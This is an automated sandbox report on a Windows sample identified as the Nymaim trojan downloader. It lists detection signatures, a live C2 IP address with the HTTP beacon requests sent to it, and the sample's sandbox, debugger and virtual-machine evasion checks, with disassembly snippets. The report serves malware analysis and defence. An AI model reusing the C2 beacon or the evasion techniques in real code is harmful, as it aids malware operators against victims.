Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565668
MD5:7b58f626a6acdca919aaae907585b8c0
SHA1:9e81feb90f37e4b80ab06846a5044330d616b748
SHA256:e57a172afd44d0e2225c849de5f6e8c2a68e263e371547b2d3f4ba951dccbc00
Tags:exeuser-Bitsight
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7B58F626A6ACDCA919AAAE907585B8C0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1660929409.0000000004A30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.3.file.exe.4a30000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 0.3.file.exe.4a30000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
      Multi AV Scanner detection for submitted file
      Source: file.exeReversingLabs: Detection: 34%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: file.exeJoe Sandbox ML: detected
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorIPs: 185.156.72.65
      Source: Malware configuration extractorIPs: 185.156.72.65
      Source: Malware configuration extractorIPs: 185.156.72.65
      Source: Malware configuration extractorIPs: 185.156.72.65
      Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
      Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache

      E-Banking Fraud

      barindex
      Yara detected Nymaim
      Source: Yara matchFile source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000003.1660929409.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      PE file contains section with special chars
      Source: file.exeStatic PE information: section name:
      Source: file.exeStatic PE information: section name: .idata
      Source: file.exeStatic PE information: section name:
      Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: file.exeStatic PE information: Section: ZLIB complexity 0.9945179803609342
      Source: file.exeStatic PE information: Section: wzuxietl ZLIB complexity 0.9924856957443697
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: file.exeReversingLabs: Detection: 34%
      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: file.exeStatic file information: File size 2021888 > 1048576
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: file.exeStatic PE information: Raw size of wzuxietl is bigger than: 0x100000 < 0x1ab600
      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
      Source: file.exeStatic PE information: real checksum: 0x1f26b7 should be: 0x1ee8d9
      Source: file.exeStatic PE information: section name:
      Source: file.exeStatic PE information: section name: .idata
      Source: file.exeStatic PE information: section name:
      Source: file.exeStatic PE information: section name: wzuxietl
      Source: file.exeStatic PE information: section name: wlxeuxhi
      Source: file.exeStatic PE information: section name: .taggant
      Source: file.exeStatic PE information: section name: entropy: 7.937026675516225
      Source: file.exeStatic PE information: section name: wzuxietl entropy: 7.951751188887942

      Boot Survival

      barindex
      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect sandboxes / dynamic malware analysis system (registry check)
      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 474371 second address: 474377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 474377 second address: 47437D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47437D second address: 474381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4A8B second address: 5F4A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC7C474F636h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4A97 second address: 5F4AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FC7C5219A5Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4AA6 second address: 5F4AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4AAA second address: 5F4ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC7C5219A5Eh 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F39FD second address: 5F3A03 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3FB7 second address: 5F3FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C5219A68h 0x00000009 jmp 00007FC7C5219A5Fh 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3FE2 second address: 5F3FE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4146 second address: 5F4162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Ch 0x00000007 jl 00007FC7C5219A56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F42C9 second address: 5F42DB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7C474F638h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jc 00007FC7C474F642h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F42DB second address: 5F42E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F42E1 second address: 5F42EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F42EB second address: 5F4306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A65h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4306 second address: 5F4314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC7C474F636h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4314 second address: 5F4324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jl 00007FC7C5219A56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F69F7 second address: 5F6A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC7C474F63Dh 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6A0E second address: 5F6A37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jl 00007FC7C5219A5Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6AA2 second address: 5F6B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007FC7C474F642h 0x0000000d jp 00007FC7C474F63Ch 0x00000013 jbe 00007FC7C474F636h 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FC7C474F638h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 and edi, dword ptr [ebp+122D2B2Ah] 0x0000003a push 00000000h 0x0000003c mov esi, dword ptr [ebp+122D364Dh] 0x00000042 call 00007FC7C474F639h 0x00000047 push ecx 0x00000048 pushad 0x00000049 jmp 00007FC7C474F649h 0x0000004e jmp 00007FC7C474F640h 0x00000053 popad 0x00000054 pop ecx 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FC7C474F642h 0x0000005e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6B33 second address: 5F6B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a ja 00007FC7C5219A56h 0x00000010 pop edi 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6B5C second address: 5F6B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6B60 second address: 5F6BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jo 00007FC7C5219A63h 0x00000010 jmp 00007FC7C5219A5Dh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC7C5219A67h 0x0000001d popad 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 jmp 00007FC7C5219A66h 0x0000002b pop ecx 0x0000002c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6BB7 second address: 5F6C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov cx, 3485h 0x0000000f push 00000003h 0x00000011 jmp 00007FC7C474F63Ah 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FC7C474F638h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D183Ch], edi 0x00000038 stc 0x00000039 push 00000003h 0x0000003b push FC6C1B8Ch 0x00000040 jmp 00007FC7C474F63Ah 0x00000045 xor dword ptr [esp], 3C6C1B8Ch 0x0000004c mov ecx, dword ptr [ebp+122D2CAEh] 0x00000052 lea ebx, dword ptr [ebp+12456905h] 0x00000058 mov ecx, dword ptr [ebp+122D2889h] 0x0000005e xchg eax, ebx 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6C30 second address: 5F6C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6CA4 second address: 5F6CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6DDB second address: 5F6E1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FC7C5219A67h 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2B8Eh] 0x00000019 call 00007FC7C5219A59h 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pop edx 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6E1E second address: 5F6E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F63Dh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6E2F second address: 5F6E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7C5219A5Bh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6E47 second address: 5F6E4D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6E4D second address: 5F6E52 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
